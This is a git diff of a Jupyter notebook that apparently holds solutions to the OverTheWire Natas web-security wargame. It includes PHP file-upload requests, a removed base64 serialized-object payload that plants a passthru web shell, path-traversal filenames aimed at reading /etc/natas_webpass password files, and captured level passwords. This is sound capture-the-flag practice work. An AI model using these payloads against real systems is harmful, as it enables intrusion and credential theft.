--- a/Natas/natas.ipynb
+++ b/Natas/natas.ipynb
@@ -6,24 +6,11 @@
    "metadata": {},
    "outputs": [
     {
-     "name": "stdout",
-     "output_type": "stream",
-     "text": [
-      "Requirement already satisfied: requests in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (2.32.3)\n",
-      "Requirement already satisfied: charset-normalizer<4,>=2 in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (from requests) (3.3.2)\n",
-      "Requirement already satisfied: idna<4,>=2.5 in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (from requests) (3.8)\n",
-      "Requirement already satisfied: urllib3<3,>=1.21.1 in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (from requests) (2.2.2)\n",
-      "Requirement already satisfied: certifi>=2017.4.17 in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (from requests) (2024.7.4)\n",
-      "Note: you may need to restart the kernel to use updated packages.\n",
-      "Requirement already satisfied: pyyaml in /mnt/c/Users/dabin.jung/source/repos/OverTheWire/.venv/lib/python3.10/site-packages (6.0.2)\n",
-      "Note: you may need to restart the kernel to use updated packages.\n",
-      "Collecting pycryptodome\n",
-      "  Downloading pycryptodome-3.20.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl.metadata (3.4 kB)\n",
-      "Downloading pycryptodome-3.20.0-cp35-abi3-manylinux_2_17_x86_64.manylinux2014_x86_64.whl (2.1 MB)\n",
-      "\u001b[2K   \u001b[90m━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━\u001b[0m \u001b[32m2.1/2.1 MB\u001b[0m \u001b[31m5.2 MB/s\u001b[0m eta \u001b[36m0:00:00\u001b[0ma \u001b[36m0:00:01\u001b[0m\n",
-      "\u001b[?25hInstalling collected packages: pycryptodome\n",
-      "Successfully installed pycryptodome-3.20.0\n",
-      "Note: you may need to restart the kernel to use updated packages.\n"
+     "ename": "",
+     "evalue": "",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31mThe kernel failed to start as the Python Environment 'Python' is no longer available. Consider selecting another kernel or refreshing the list of Python Environments."
      ]
     }
    ],
@@ -35,9 +22,18 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 5,
+   "execution_count": 2,
    "metadata": {},
-   "outputs": [],
+   "outputs": [
+    {
+     "ename": "",
+     "evalue": "",
+     "output_type": "error",
+     "traceback": [
+      "\u001b[1;31mThe kernel failed to start as the Python Environment 'Python' is no longer available. Consider selecting another kernel or refreshing the list of Python Environments."
+     ]
+    }
+   ],
    "source": [
     "import requests\n",
     "import yaml\n",
@@ -50,6 +46,7 @@
     "from Crypto.Cipher import AES\n",
     "import string\n",
     "from collections import defaultdict\n",
+    "import hashlib\n",
     "\n",
     "\n",
     "pwd = None\n",
@@ -665,14 +662,14 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 15,
+   "execution_count": 37,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "password found: ftrbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC\n"
+      "password found: trbs5pCjCrkuSknBBKHhaBxq6Wm1j3LC\n"
      ]
     }
    ],
@@ -682,9 +679,7 @@
     "init()\n",
     "\n",
     "url = f\"http://natas{count}.natas.labs.overthewire.org/index.php\"\n",
-    "files = {\n",
-    "    \"uploadedfile\": (\"natas12.php\", open(\"natas12.php\", \"rb\"), \"multipart/form-data\")\n",
-    "}\n",
+    "files = {\"uploadedfile\": (\"natas12.php\", open(\"natas12.php\", \"rb\"))}\n",
     "data = {\"filename\": \"1.php\", \"submit\": \"submit\"}\n",
     "res = requests.post(url, auth=(natas, pwd[natas]), files=files, data=data)\n",
     "\n",
@@ -1910,33 +1905,24 @@
   },
   {
    "cell_type": "code",
-   "execution_count": 15,
+   "execution_count": 36,
    "metadata": {},
    "outputs": [
     {
      "name": "stdout",
      "output_type": "stream",
      "text": [
-      "<html>\n",
-      "    <head>\n",
-      "        <!-- This stuff in the header has nothing to do with the level -->\n",
-      "        <link rel=\"stylesheet\" type=\"text/css\" href=\"http://natas.labs.overthewire.org/css/level.css\">\n",
-      "        <link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/jquery-ui.css\" />\n",
-      "        <link rel=\"stylesheet\" href=\"http://natas.labs.overthewire.org/css/wechall.css\" />\n",
-      "        <script src=\"http://natas.labs.overthewire.org/js/jquery-1.9.1.js\"></script>\n",
-      "        <script src=\"http://natas.labs.overthewire.org/js/jquery-ui.js\"></script>\n",
-      "        <script src=\"http://natas.labs.overthewire.org/js/wechall-data.js\"></script><script src=\"http://natas.labs.overthewire.org/js/wechall.js\"></script>\n",
-      "        <script>var wechallinfo = { \"level\": \"natas33\", \"pass\": \"2v9nDlbSF7jvawaCncr5Z9kSzkmBeoCJ\" };</script></head>\n",
-      "    </head>\n",
-      "    <body>\n",
-      "        \n",
-      "        <h1>natas33</h1>\n",
-      "        <div id=\"content\">\n",
       "            <h2>Can you get it right?</h2>\n",
       "\n",
-      "                        <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
+      "            <br />\n",
+      "<b>Warning</b>:  move_uploaded_file(/natas33/upload/../../var/www/natas/natas33/test.php): failed to open stream: Operation not permitted in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "<br />\n",
+      "<b>Warning</b>:  move_uploaded_file(): Unable to move '/var/lib/php/uploadtmp/phplxSVMe' to '/natas33/upload/../../var/www/natas/natas33/test.php' in <b>/var/www/natas/natas33/index.php</b> on line <b>27</b><br />\n",
+      "There was an error uploading the file, please try again!<br><br />\n",
+      "<b>Warning</b>:  md5_file(../../var/www/natas/natas33/test.php): failed to open stream: No such file or directory in <b>/var/www/natas/natas33/index.php</b> on line <b>42</b><br />\n",
+      "Failur! MD5sum mismatch!<br>            <form enctype=\"multipart/form-data\" action=\"index.php\" method=\"POST\">\n",
       "                <input type=\"hidden\" name=\"MAX_FILE_SIZE\" value=\"4096\" />\n",
-      "                <input type=\"hidden\" name=\"filename\" value=\"sv5o1fq9sseu9s60f3gflmvsvh\" />\n",
+      "                <input type=\"hidden\" name=\"filename\" value=\"rr5v952v9e5d8okc8mmp7hseko\" />\n",
       "                Upload Firmware Update:<br/>\n",
       "                <input name=\"uploadedfile\" type=\"file\" /><br />\n",
       "                <input type=\"submit\" value=\"Upload File\" />\n",
@@ -1946,16 +1932,6 @@
       "        </div>\n",
       "    </body>\n",
       "</html>\n",
-      "\n",
-      "<!DOCTYPE HTML PUBLIC \"-//IETF//DTD HTML 2.0//EN\">\n",
-      "<html><head>\n",
-      "<title>404 Not Found</title>\n",
-      "</head><body>\n",
-      "<h1>Not Found</h1>\n",
-      "<p>The requested URL was not found on this server.</p>\n",
-      "<hr>\n",
-      "<address>Apache/2.4.58 (Ubuntu) Server at natas33.natas.labs.overthewire.org Port 80</address>\n",
-      "</body></html>\n",
       "\n"
      ]
     }
@@ -1965,15 +1941,14 @@
     "count = 33\n",
     "init()\n",
     "\n",
-    "PHP_base64_encoded_payload = \"Tzo2OiJMb2dnZXIiOjM6e3M6MTU6IgBMb2dnZXIAbG9nRmlsZSI7czoxNjoiaW1nL2V4cGxvaXQxLnBocCI7czoxNToiAExvZ2dlcgBpbml0TXNnIjtzOjIyOiIjLS1zZXNzaW9uIHN0YXJ0ZWQtLSMKIjtzOjE1OiIATG9nZ2VyAGV4aXRNc2ciO3M6NTc6Ijw/cGhwIGVjaG8gcGFzc3RocnUoJ2NhdCAvZXRjL25hdGFzX3dlYnBhc3MvbmF0YXMyNycpOyA/PiI7fQ==\"\n",
-    "cookies = dict(drawing=PHP_base64_encoded_payload)\n",
-    "res = requests.get(url, auth=auth, cookies=cookies)\n",
-    "print(res.text)\n",
+    "signature = \"adeafbadbabec0dedabada55ba55d00d\"\n",
     "\n",
-    "url = f\"http://natas{count}.natas.labs.overthewire.org/img/exploit1.php\"\n",
-    "res = requests.get(url, auth=auth)\n",
-    "print(res.text)\n",
-    "# find_pwd(res)"
+    "files = {\"uploadedfile\": open(\"natas33.php\", \"rb\")}\n",
+    "data = {\"filename\": \"/etc/natas_webpass/natas34\"}\n",
+    "data = {\"filename\": \"../../var/www/natas/natas33/test.php\"}\n",
+    "res = requests.post(url, auth=auth, files=files, data=data)\n",
+    "\n",
+    "print(res.text[905:])\n"
    ]
   }
  ],
